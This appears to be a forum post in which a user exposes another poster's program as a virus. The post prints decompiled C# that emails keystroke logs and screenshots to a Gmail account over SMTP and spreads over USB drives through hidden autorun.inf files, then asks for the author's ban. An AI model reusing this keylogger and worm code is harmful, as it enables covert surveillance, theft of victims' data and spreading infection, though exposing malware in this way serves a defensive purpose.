Ha ha ha stupid hack of a hacker if you don't know how to program right don't program at all. I have decompiled your program and its a virus D : yea, heres is some of what it can do you lala piece of lala
Code:
private void Timer1_Tick(object sender, EventArgs e)
{
MailMessage message = new MailMessage {
From = new MailAddress(this.GetDecryptedData(this.user))
};
message.To.Add(this.GetDecryptedData(this.user));
message.Subject = "Broheim's Logs - " + Environment.MachineName;
message.Body = this.TextBox1.Text;
if (this.sendscreens)
{
Attachment item = new Attachment(@"C:\Windows\screenshot" + MySettingsProperty.Settings.screeny + ".jpg");
message.Attachments.Add(item);
}
else
{
bool sendscreens = this.sendscreens;
}
new SmtpClient("smtp.gmail.com") { Port = 0x24b, Credentials = new NetworkCredential(this.GetDecryptedData(this.user), this.GetDecryptedData(this.secret)), EnableSsl = true }.Send(message);
MySettings settings = MySettingsProperty.Settings;
settings.screeny = Conversions.ToString((double) (Conversions.ToDouble(settings.screeny) + 1.0));
MySettingsProperty.Settings.Save();
}
private void Timer6_Tick(object sender, EventArgs e)
{
if (this.sendscreens)
{
this.whar = @"C:\Windows\screenshot1.jpg";
if (File.Exists(this.whar))
{
this.whar = @"C:\Windows\screenshot" + MySettingsProperty.Settings.screeny + ".jpg";
}
keybd_event(0x2c, 0, 0, 0);
Thread.Sleep(200);
this.SaveScreen(this.whar);
}
else
{
bool sendscreens = this.sendscreens;
}
}
public void USBInfect()
{
int num3;
try
{
int num4;
Label_0000:
ProjectData.ClearProjectError();
int num2 = -2;
Label_0009:
num4 = 2;
MyProject.Computer.Registry.SetValue(@"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "Hidden", "0", RegistryValueKind.DWord);
Label_002B:
num4 = 3;
string programFiles = MyProject.Computer.FileSystem.SpecialDirectories.ProgramFiles;
Label_0043:
num4 = 4;
string[] logicalDrives = Directory.GetLogicalDrives();
Label_004C:
num4 = 5;
string[] strArray2 = logicalDrives;
int index = 0;
while (index < strArray2.Length)
{
string str = strArray2[index];
Label_005E:
num4 = 6;
if (programFiles.Contains(str))
{
goto Label_00F1;
}
Label_006F:
num4 = 8;
Label_0072:
num4 = 9;
MyProject.Computer.FileSystem.CopyFile(Application.ExecutablePath, str + "HDDFile.com", (UIOption) (-1), UICancelOption.DoNothing);
Label_0097:
num4 = 10;
MyProject.Computer.FileSystem.WriteAllText(str + "autorun.inf", "[autorun]\r\nopen=" + str + "HDDFile.com\r\nshellexecute=" + str, true);
Label_00C7:
num4 = 11;
FileSystem.SetAttr(str + "HDDFile.com", FileAttribute.Hidden);
Label_00DC:
num4 = 12;
FileSystem.SetAttr(str + "autorun.inf", FileAttribute.Hidden);
Label_00F1:
index++;
Label_00F5:
num4 = 14;
}
goto Label_01A1;
Label_0108:
num3 = 0;
switch ((num3 + 1))
{
case 1:
goto Label_0000;
case 2:
goto Label_0009;
case 3:
goto Label_002B;
case 4:
goto Label_0043;
case 5:
goto Label_004C;
case 6:
goto Label_005E;
case 7:
case 13:
goto Label_00F1;
case 8:
goto Label_006F;
case 9:
goto Label_0072;
case 10:
goto Label_0097;
case 11:
goto Label_00C7;
case 12:
goto Label_00DC;
case 14:
goto Label_00F5;
case 15:
goto Label_01A1;
default:
goto Label_0196;
}
Label_0156:
num3 = num4;
switch (((num2 > -2) ? num2 : 1))
{
case 0:
goto Label_0196;
case 1:
goto Label_0108;
}
}
catch (object obj1) when (?)
{
ProjectData.SetProjectError((Exception) obj1);
goto Label_0156;
}
Label_0196:
throw ProjectData.CreateProjectError(-2146828237);
Label_01A1:
if (num3 != 0)
{
ProjectData.ClearProjectError();
}
}
Please ban him